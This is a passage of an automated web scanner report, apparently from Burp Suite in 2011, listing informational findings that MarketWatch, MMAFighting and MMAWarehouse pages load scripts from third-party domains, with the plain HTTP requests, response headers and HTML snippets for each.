  • http://c.wsj.net/dynamic/hat/hatloader3.js
  • http://js.revsci.net/gateway/gw.js?csid=G07608

Request

GET /News/Story/Story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 06-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp01
Date: Thu, 05 May 2011 10:58:41 GMT
Content-Length: 50800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
</script>

<script type="text/javascript" src="http://c.wsj.net/dynamic/hat/hatloader3.js"></script>
...[SNIP]...
<div id="ad_DockingbarExpandable" class="advertisement ">
       
       
               <script src="http://ad.doubleclick.net/adj/marketwatch.com/brokerdock;u=%5e%5e;sz=230x25;tile=1;ord=312847891?" type="text/javascript"></script>
...[SNIP]...
<!-- START: RSI Code -->
       <script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=G07608"></script>
...[SNIP]...

17.129. http://www.mmafighting.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://admin.brightcove.com/js/BrightcoveExperiences.js
  • http://o.aolcdn.com/ads/adsWrapper.js
  • http://o.aolcdn.com/art/feedback/feedback1.js
  • http://o.aolcdn.com/art/merge/?f=/fanhouse/design/v2/scripts/origin/jquery-cookie.min.js&f=/fanhouse/design/v2/scripts/origin/common.min.js&f=/fanhouse/design/v2/scripts/origin/common_orig.min.js
  • http://o.aolcdn.com/art/merge/?f=/fanhouse/design/v2/scripts/origin/pagination.js&f=/fanhouse/design/v2/scripts/origin/pagination-lineup.js&f=/fanhouse/design/v2/scripts/origin/jquery-cycle.js&f=/fanhouse/design/v2/scripts/origin/openauthclient.js&f=/fanhouse/design/v2/scripts/origin/blogs.js&f=/fanhouse/design/v2/scripts/origin/jsoncomments.js
  • http://o.aolcdn.com/feedback/feedback1.js
  • http://o.aolcdn.com/omniunih.js
  • http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.4.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.addthis.min.js&file=/aol/jquery.aolphotogallery-1.0.min.js
  • http://o.aolcdn.com/videoplayer/loader.js
  • http://www.aolcdn.com/fanhouse/mmafighting/mmafighting.js

Request

GET / HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:41 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999984
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 64750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
<!-- FanHouse assets -->
<script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.4.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.addthis.min.js&file=/aol/jquery.aolphotogallery-1.0.min.js" type="text/javascript"></script>

<script type="text/javascript" src="http://o.aolcdn.com/art/merge/?f=/fanhouse/design/v2/scripts/origin/jquery-cookie.min.js&f=/fanhouse/design/v2/scripts/origin/common.min.js&f=/fanhouse/design/v2/scripts/origin/common_orig.min.js"></script>

<link rel="stylesheet" type="text/css" href="http://o.aolcdn.com/art/fanhouse/design/v2/css/jcar/scoreboard/skin.css?v=1.2" />

<script type="text/javascript" src="http://o.aolcdn.com/art/feedback/feedback1.js"></script>


<!-- FanHouse assets -->
<script type="text/javascript" src="http://o.aolcdn.com/art/merge/?f=/fanhouse/design/v2/scripts/origin/pagination.js&f=/fanhouse/design/v2/scripts/origin/pagination-lineup.js&f=/fanhouse/design/v2/scripts/origin/jquery-cycle.js&f=/fanhouse/design/v2/scripts/origin/openauthclient.js&f=/fanhouse/design/v2/scripts/origin/blogs.js&f=/fanhouse/design/v2/scripts/origin/jsoncomments.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<link media="screen" type="text/css" rel="stylesheet" href="http://o.aolcdn.com/art/ch_fanhouse/articles/css/communitycommentoverwritev27.css" />

<script type="text/javascript" src="http://o.aolcdn.com/feedback/feedback1.js"></script>

<!-- MMA Fighting assets -->
<script type="text/javascript" src="http://www.aolcdn.com/fanhouse/mmafighting/mmafighting.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...
</div>
<script src='http://o.aolcdn.com/videoplayer/loader.js'></script>
...[SNIP]...
</h2>
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</h2>
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

17.130. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://admin.brightcove.com/js/BrightcoveExperiences.js
  • http://o.aolcdn.com/ads/adsWrapper.js
  • http://o.aolcdn.com/art/feedback/feedback1.js
  • http://o.aolcdn.com/art/merge/?f=/fanhouse/design/v2/scripts/origin/jquery-cookie.min.js&f=/fanhouse/design/v2/scripts/origin/common.min.js&f=/fanhouse/design/v2/scripts/origin/common_orig.min.js
  • http://o.aolcdn.com/art/merge/?f=/fanhouse/design/v2/scripts/origin/pagination.js&f=/fanhouse/design/v2/scripts/origin/pagination-lineup.js&f=/fanhouse/design/v2/scripts/origin/jquery-cycle.js&f=/fanhouse/design/v2/scripts/origin/openauthclient.js&f=/fanhouse/design/v2/scripts/origin/blogs.js&f=/fanhouse/design/v2/scripts/origin/jsoncomments.js
  • http://o.aolcdn.com/feedback/feedback1.js
  • http://o.aolcdn.com/omniunih.js
  • http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.4.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.addthis.min.js&file=/aol/jquery.aolphotogallery-1.0.min.js
  • http://o.aolcdn.com/os_merge/?file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js
  • http://www.aolcdn.com/fanhouse/mmafighting/mmafighting.js
  • http://www.blogcdn.com/js/ajax_c.js
  • http://www.weblogsinc.com/b-c/sns.js

Request

GET /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:41 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 10:58:41 GMT; path=/
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<!-- FanHouse assets -->
<script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.4.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.addthis.min.js&file=/aol/jquery.aolphotogallery-1.0.min.js" type="text/javascript"></script>

<script type="text/javascript" src="http://o.aolcdn.com/art/merge/?f=/fanhouse/design/v2/scripts/origin/jquery-cookie.min.js&f=/fanhouse/design/v2/scripts/origin/common.min.js&f=/fanhouse/design/v2/scripts/origin/common_orig.min.js"></script>

<link rel="stylesheet" type="text/css" href="http://o.aolcdn.com/art/fanhouse/design/v2/css/jcar/scoreboard/skin.css?v=1.2" />

<script type="text/javascript" src="http://o.aolcdn.com/art/feedback/feedback1.js"></script>


<!-- FanHouse assets -->
<script type="text/javascript" src="http://o.aolcdn.com/art/merge/?f=/fanhouse/design/v2/scripts/origin/pagination.js&f=/fanhouse/design/v2/scripts/origin/pagination-lineup.js&f=/fanhouse/design/v2/scripts/origin/jquery-cycle.js&f=/fanhouse/design/v2/scripts/origin/openauthclient.js&f=/fanhouse/design/v2/scripts/origin/blogs.js&f=/fanhouse/design/v2/scripts/origin/jsoncomments.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<link media="screen" type="text/css" rel="stylesheet" href="http://o.aolcdn.com/art/ch_fanhouse/articles/css/communitycommentoverwritev27.css" />

<script type="text/javascript" src="http://o.aolcdn.com/feedback/feedback1.js"></script>

<!-- MMA Fighting assets -->
<script type="text/javascript" src="http://www.aolcdn.com/fanhouse/mmafighting/mmafighting.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://www.blogcdn.com/js/ajax_c.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.weblogsinc.com/b-c/sns.js"></script>
...[SNIP]...
</h2>
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</h2>
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</body>
<script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery.getjs-1.0.min.js&amp;file=/aol/jquery.inlinecss-1.0.min.js&amp;file=/aol/jquery.sonar.min.js&amp;file=/aol/jquery.facebooksocial.min.js" type="text/javascript"></script>
...[SNIP]...

17.131. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://admin.brightcove.com/js/BrightcoveExperiences.js
  • http://o.aolcdn.com/ads/adsWrapper.js
  • http://o.aolcdn.com/art/feedback/feedback1.js
  • http://o.aolcdn.com/art/merge/?f=/fanhouse/design/v2/scripts/origin/jquery-cookie.min.js&f=/fanhouse/design/v2/scripts/origin/common.min.js&f=/fanhouse/design/v2/scripts/origin/common_orig.min.js
  • http://o.aolcdn.com/art/merge/?f=/fanhouse/design/v2/scripts/origin/pagination.js&f=/fanhouse/design/v2/scripts/origin/pagination-lineup.js&f=/fanhouse/design/v2/scripts/origin/jquery-cycle.js&f=/fanhouse/design/v2/scripts/origin/openauthclient.js&f=/fanhouse/design/v2/scripts/origin/blogs.js&f=/fanhouse/design/v2/scripts/origin/jsoncomments.js
  • http://o.aolcdn.com/feedback/feedback1.js
  • http://o.aolcdn.com/omniunih.js
  • http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.4.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.addthis.min.js&file=/aol/jquery.aolphotogallery-1.0.min.js
  • http://o.aolcdn.com/os_merge/?file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js
  • http://www.aolcdn.com/fanhouse/mmafighting/mmafighting.js
  • http://www.blogcdn.com/js/ajax_c.js
  • http://www.weblogsinc.com/b-c/sns.js

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545 HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:18 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:18 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:17 GMT; path=/
Content-Type: text/html
Content-Length: 63415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<!-- FanHouse assets -->
<script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.4.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.addthis.min.js&file=/aol/jquery.aolphotogallery-1.0.min.js" type="text/javascript"></script>

<script type="text/javascript" src="http://o.aolcdn.com/art/merge/?f=/fanhouse/design/v2/scripts/origin/jquery-cookie.min.js&f=/fanhouse/design/v2/scripts/origin/common.min.js&f=/fanhouse/design/v2/scripts/origin/common_orig.min.js"></script>

<link rel="stylesheet" type="text/css" href="http://o.aolcdn.com/art/fanhouse/design/v2/css/jcar/scoreboard/skin.css?v=1.2" />

<script type="text/javascript" src="http://o.aolcdn.com/art/feedback/feedback1.js"></script>


<!-- FanHouse assets -->
<script type="text/javascript" src="http://o.aolcdn.com/art/merge/?f=/fanhouse/design/v2/scripts/origin/pagination.js&f=/fanhouse/design/v2/scripts/origin/pagination-lineup.js&f=/fanhouse/design/v2/scripts/origin/jquery-cycle.js&f=/fanhouse/design/v2/scripts/origin/openauthclient.js&f=/fanhouse/design/v2/scripts/origin/blogs.js&f=/fanhouse/design/v2/scripts/origin/jsoncomments.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<link media="screen" type="text/css" rel="stylesheet" href="http://o.aolcdn.com/art/ch_fanhouse/articles/css/communitycommentoverwritev27.css" />

<script type="text/javascript" src="http://o.aolcdn.com/feedback/feedback1.js"></script>

<!-- MMA Fighting assets -->
<script type="text/javascript" src="http://www.aolcdn.com/fanhouse/mmafighting/mmafighting.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://www.blogcdn.com/js/ajax_c.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.weblogsinc.com/b-c/sns.js"></script>
...[SNIP]...
</h2>
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</h2>
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</body>
<script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery.getjs-1.0.min.js&amp;file=/aol/jquery.inlinecss-1.0.min.js&amp;file=/aol/jquery.sonar.min.js&amp;file=/aol/jquery.facebooksocial.min.js" type="text/javascript"></script>
...[SNIP]...

17.132. http://www.mmawarehouse.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mmawarehouse.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://mmawarehouse.s3.amazonaws.com/js/scroller.js
  • http://mmawarehouse.s3.amazonaws.com/js/stscode.js
  • http://s3.amazonaws.com/mmawarehouse/js/popup.js
  • https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET / HTTP/1.1
Host: www.mmawarehouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:58:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 65726
Content-Type: text/html
Set-Cookie: vsettings=; expires=Sun, 29-Apr-2012 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCASTQSBA=CBIDGODBKHCLFONNGAPGKJPO; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="stylesheet" href="//s3.amazonaws.com/mmawarehouse/css/scroller.css"/>

<script type="text/javascript" src="//s3.amazonaws.com/mmawarehouse/js/popup.js"></script>
...[SNIP]...
<div id="homepage_top_row1">
    <script type="text/javascript" src="http://mmawarehouse.s3.amazonaws.com/js/stscode.js"></script>
       <script type="text/javascript" src="http://mmawarehouse.s3.amazonaws.com/js/scroller.js"></script>
...[SNIP]...
<div id="footer_geotrust"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...

17.133. http://www.mmawarehouse.com/Affliction-Georges-St-Pierre-GSP-Icon-UFC-129-Reve-p/aff-1404.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mmawarehouse.com
Path:   /Affliction-Georges-St-Pierre-GSP-Icon-UFC-129-Reve-p/aff-1404.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://s3.amazonaws.com/mmawarehouse/js/popup.js
  • https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /Affliction-Georges-St-Pierre-GSP-Icon-UFC-129-Reve-p/aff-1404.htm HTTP/1.1
Host: www.mmawarehouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:58:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 70916
Content-Type: text/html
Set-Cookie: vsettings=; expires=Sun, 29-Apr-2012 07:00:00 GMT; path=/
Set-Cookie: History50=37411; expires=Fri, 20-May-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCASTQSBA=DBIDGODBMBCIKBCOHINKMKNJ; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="stylesheet" href="//s3.amazonaws.com/mmawarehouse/css/scroller.css"/>

<script type="text/javascript" src="//s3.amazonaws.com/mmawarehouse/js/popup.js"></script>
...[SNIP]...
<div id="footer_geotrust"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...

17.134. http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-Limited-E-p/det-1110.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mmawarehouse.com
Path:   /Dethrone-Jose-Aldo-Signature-Series-Tee-Limited-E-p/det-1110.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://s3.amazonaws.com/mmawarehouse/js/popup.js
  • https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /Dethrone-Jose-Aldo-Signature-Series-Tee-Limited-E-p/det-1110.htm HTTP/1.1
Host: www.mmawarehouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:58:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 66357
Content-Type: text/html
Set-Cookie: vsettings=; expires=Sun, 29-Apr-2012 07:00:00 GMT; path=/
Set-Cookie: History50=30854; expires=Fri, 20-May-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCASTQSBA=GBIDGODBMMGIFDGKICDMCOFN; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="stylesheet" href="//s3.amazonaws.com/mmawarehouse/css/scroller.css"/>

<script type="text/javascript" src="//s3.amazonaws.com/mmawarehouse/js/popup.js"></script>
...[SNIP]...
<div id="footer_geotrust"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...

17.135. http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-p/det-1039.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mmawarehouse.com
Path:   /Dethrone-Jose-Aldo-Signature-Series-Tee-p/det-1039.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://s3.amazonaws.com/mmawarehouse/js/popup.js
  • https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /Dethrone-Jose-Aldo-Signature-Series-Tee-p/det-1039.htm HTTP/1.1
Host: www.mmawarehouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:58:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 66109
Content-Type: text/html
Set-Cookie: vsettings=; expires=Sun, 29-Apr-2012 07:00:00 GMT; path=/
Set-Cookie: History50=22942; expires=Fri, 20-May-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCASTQSBA=IBIDGODBOHAHGLIENKMIAPLN; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="stylesheet" href="//s3.amazonaws.com/mmawarehouse/css/scroller.css"/>

<script type="text/javascript" src="//s3.amazonaws.com/mmawarehouse/js/popup.js"></script>
...[SNIP]...
<div id="footer_geotrust"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...

17.136. http://www.mmawarehouse.com/FDM-Jake-Shields-T-Shirt-p/fdm-1009.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mmawarehouse.com
Path:   /FDM-Jake-Shields-T-Shirt-p/fdm-1009.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://s3.amazonaws.com/mmawarehouse/js/popup.js
  • https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /FDM-Jake-Shields-T-Shirt-p/fdm-1009.htm HTTP/1.1
Host: www.mmawarehouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:58:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 65448
Content-Type: text/html
Set-Cookie: vsettings=; expires=Sun, 29-Apr-2012 07:00:00 GMT; path=/
Set-Cookie: History50=34079; expires=Fri, 20-May-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCASTQSBA=JBIDGODBICLOONOEAHEOGHJJ; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="stylesheet" href="//s3.amazonaws.com/mmawarehouse/css/scroller.css"/>

<script type="text/javascript" src="//s3.amazonaws.com/mmawarehouse/js/popup.js"></script>
...[SNIP]...
<div id="footer_geotrust"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...

17.137. http://www.mmawarehouse.com/FORM-Athletics-Jon-Bones-Jones-UFC-128-Walkout-T-S-p/frm-1070.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mmawarehouse.com
Path:   /FORM-Athletics-Jon-Bones-Jones-UFC-128-Walkout-T-S-p/frm-1070.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://s3.amazonaws.com/mmawarehouse/js/popup.js
  • https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /FORM-Athletics-Jon-Bones-Jones-UFC-128-Walkout-T-S-p/frm-1070.htm HTTP/1.1
Host: www.mmawarehouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:58:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 66520
Content-Type: text/html
Set-Cookie: vsettings=; expires=Sun, 29-Apr-2012 07:00:00 GMT; path=/
Set-Cookie: History50=36372; expires=Fri, 20-May-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCASTQSBA=CCIDGODBOBGJFCPIECHDNCDM; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="stylesheet" href="//s3.amazonaws.com/mmawarehouse/css/scroller.css"/>

<script type="text/javascript" src="//s3.amazonaws.com/mmawarehouse/js/popup.js"></script>
...[SNIP]...
<div id="footer_geotrust"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.mmawarehouse.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...

17.138. http://www.mmawarehouse.com/Under-Armour-Georges-St-Pierre-GSP-Explosive-Bi-p/uax-1052.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mmawarehouse.com
